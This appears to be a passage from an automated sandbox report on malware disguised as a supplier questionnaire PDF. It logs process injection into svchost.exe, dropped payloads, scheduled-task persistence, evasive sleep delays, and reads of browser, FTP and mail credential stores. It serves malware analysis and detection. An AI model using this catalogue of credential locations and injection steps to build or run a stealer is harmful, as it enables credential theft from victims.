Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\Download\{430FD4D0-B729-4F61-AA34-91526481799D}\1.3.36.372\GoogleUpdateSetup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\Update\1.3.36.372\GoogleUpdateOnDemand.exe
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE TID: 7060 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 7016 Thread sleep time: -120000s >= -30000s
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE TID: 6220 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe TID: 6672 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe TID: 6720 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -200000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 1996 Thread sleep count: 1048 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99857s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99730s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99618s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 1996 Thread sleep count: 8792 > 30
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99507s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99397s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99282s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99144s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99033s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98890s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98779s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98668s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98556s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98445s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98334s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98208s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98096s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97968s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97856s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97745s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97633s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97523s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97414s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97302s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97190s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97062s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -96952s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99889s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99777s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99665s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99553s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99427s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99300s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99173s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -99045s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98934s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98822s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98710s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98598s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98470s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98342s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98221s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -98087s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97975s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97864s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97736s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97609s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97497s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97385s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe TID: 7032 Thread sleep time: -97270s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 6248 Thread sleep time: -330000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 6248 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 7020 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\svchost.exe File opened: PhysicalDrive0
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 100000
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99857
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99730
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99618
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99507
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99397
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99282
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99144
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99033
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98890
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98779
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98668
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98556
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98445
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98334
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98208
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98096
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97968
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97856
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97745
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97633
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97523
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97414
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97302
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97190
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97062
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 96952
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99889
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99777
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99665
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99553
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99427
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99300
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99173
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 99045
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98934
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98822
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98710
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98598
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98470
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98342
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98221
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 98087
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97975
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97864
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97736
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97609
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97497
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97385
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Thread delayed: delay time: 97270
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\UIThemes\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\dc-desktop-app-dropin\1.0.0_1.0.0\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\app1\
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process information queried: ProcessInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Memory written: C:\Windows\SysWOW64\svchost.exe base: 30D5008
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\server_BTC.exe "C:\Users\user\AppData\Local\Temp\server_BTC.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\neworigin.exe "C:\Users\user\AppData\Local\Temp\neworigin.exe"
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Users\user\AppData\Local\Temp\build.exe "C:\Users\user\AppData\Local\Temp\build.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\schtasks.exe
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe "C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp8F22.tmp.cmd""
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\alg.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST7919.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST792A.tmp VolumeInformation
Source: C:\Users\user\Desktop\NEOM_SUPPLIER_EOI&QUESTIONNAIR_FORM_SHEET.PDF.EXE Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Microsoft Update Health Tools\uhssvc.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Users\user\AppData\Local\Temp\server_BTC.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\server_BTC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Users\user\AppData\Local\Temp\neworigin.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000010.00000002.1218270689.0000000003712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.1208342967.0000000000D12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Source: Yara match File source: 00000012.00000002.2465149374.000000000329E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.000000000329A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1218270689.0000000003789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.1209788633.0000000000E42000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: Yara match File source: 00000013.00000002.1360287595.0000000003496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\sp4c0p22.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match File source: 00000010.00000002.1218270689.0000000003712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.1208342967.0000000000D12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Source: Yara match File source: 00000013.00000002.1360287595.0000000003496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 00000010.00000002.1218270689.0000000003712000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.1208342967.0000000000D12000.00000002.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\neworigin.exe, type: DROPPED
Source: Yara match File source: 00000012.00000002.2465149374.000000000329E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.000000000329A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.0000000003271000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.2465149374.00000000032AF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1218270689.0000000003789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.1209788633.0000000000E42000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\build.exe, type: DROPPED
Source: Yara match File source: 00000013.00000002.1360287595.0000000003496000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY